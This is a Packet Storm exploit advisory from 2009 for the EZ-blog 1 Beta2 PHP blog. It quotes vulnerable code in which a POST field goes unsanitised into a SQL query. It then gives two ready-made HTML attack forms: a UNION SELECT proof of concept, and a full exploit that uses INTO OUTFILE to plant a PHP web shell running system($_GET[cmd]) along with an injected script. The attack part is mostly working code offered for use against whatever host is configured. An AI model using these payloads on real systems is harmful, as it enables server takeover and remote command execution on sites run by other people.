what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

EZ-blog Beta2 SQL Injection / Shell Upload

EZ-blog Beta2 SQL Injection / Shell Upload
Posted Apr 28, 2009
Authored by YEnH4ckEr

EZ-blog version 1 Beta2 suffers from SQL injection and shell upload vulnerabilities.

tags | exploit, shell, vulnerability, sql injection, file upload
SHA-256 | 64fb6571f5920bff78bee52910bd48f879880543f18ace534242d6f448e448b0

EZ-blog Beta2 SQL Injection / Shell Upload

Change Mirror Download
-------------------------------------------------
SQL INJECTION VULNERABILITY --EZ-blog Beta2-->
-------------------------------------------------

CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/ez-blog/
-->DOWNLOAD: http://sourceforge.net/projects/ez-blog/
-->DEMO: N/A
-->CATEGORY: CMS / Blogging
-->DESCRIPTION: EZ-Blog is an open-source blog program written in PHP.
Presently, only MySQL is supported, but a PostgreSQL version is planned.
-->RELEASED: 2009-04-26

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: SQL INJECTION (SHELL UPLOAD)
-->AFFECT VERSION: <=1 Beta2
-->Discovered Bug date: 2009-04-26
-->Reported Bug date: 2009-04-27
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)


#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>


-------
INTRO:
-------


An exploit was published by drosophila with Multiple SQL Injection in EZ-blog Beta-1,
they (apparently) fixed it but the system is still vulnerable.


-----------
FILE VULN:
-----------

Path --> [HOME_PATH]/public/specific.php

..

$whichcategory = Trim($_POST['category']);

..
if ($whichcategory=='All'){
$query = "SELECT * FROM content ORDER BY id DESC";
}else{
$query = "SELECT * FROM content WHERE topic ='" . $whichcategory . "' ORDER BY id DESC";
}
$result = mysql_query($query);
..


------------------
PROOF OF CONCEPT:
------------------

Copy and save --> PoC.html.
Configure --> HOST, HOME_PATH

<html>
<title>
PoC BY Y3NH4CK3R --PROUD TO BE SPANISH-->
</title>
<h1>
Click "Execute PoC" to launch the proof of concept (SQLi)...
</h1>
<body bgcolor=#000000 text=#ffffff>
<form method="post" action="http:[HOST]/[HOME_PATH]/public/specific.php">
<input type="hidden" name="category" value="-1' union all select version(),version(),version(),version(),version(),version(),version(),version()/*">
<input name="submit" value="Execute PoC" type="submit">
</form>
<br>
<br>
<h2>
<font color=#ff0000>
BY y3nh4ck3r. Contact: y3nh4ck3r@gmail.com
</font>
</h2>
</body>
</html>


------------------------
EXPLOIT (SHELL UPLOAD):
------------------------

This aplication hasn't admin authentication using DB, ie, admin panel uses .htaccess file.
This is a complete exploit: SQL Injection --> Shell Upload, and XSS...all in one ;)

Copy and save --> exploit.html.
Configure --> HOST, HOME_PATH and COMPLETE-PATH.


<html>
<title>
PoC BY Y3NH4CK3R --PROUD TO BE SPANISH-->
</title>
<h1>
Click "Upload shell" to launch the exploit (SQLi)...
</h1>
<body bgcolor=#000000 text=#ffffff>
<form method="post" action="http://[HOST]/[HOME_PATH]/public/specific.php">
<input type="hidden" name="category" value="-1' union all select '<HTML><title>SHELL BY --Y3NH4CK3R--></title><body text=#ffffff bgcolor=#000000><center><h1>','YOUR SHELL IS ON!<br></h1></center><br><br>','<font color=#ff0000><h2>Get var (cmd) to execute comands. Enjoy it!</h2></font>','<script>alert(String.fromCharCode(67,111,109,109,97,110,100,32,101,120,101,99,117,116,101,100,33))</script>','<h3>Command Result:</h3>','<?php system($_GET[cmd]); ?>','<br><br><font color=#ff0000><h3>By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com</h3></font></body>','</HTML>' INTO OUTFILE '[COMPLETE-PATH]/public/shell.php'/*">
<input name="submit" value="Upload shell" type="submit">
</form><br>
<h3>
Your shell in "http://[HOST]/[HOME_PATH]/public/shell.php"
</h3>
<br>
<h2>
<font color=#ff0000>
BY y3nh4ck3r. Contact: y3nh4ck3r@gmail.com
</font>
</h2>
</body>
</html>


Your shell in --> http://[HOST]/[HOME_PATH]/public/shell.php


#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL GREETZ TO: Str0ke, JosS, drosophila ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close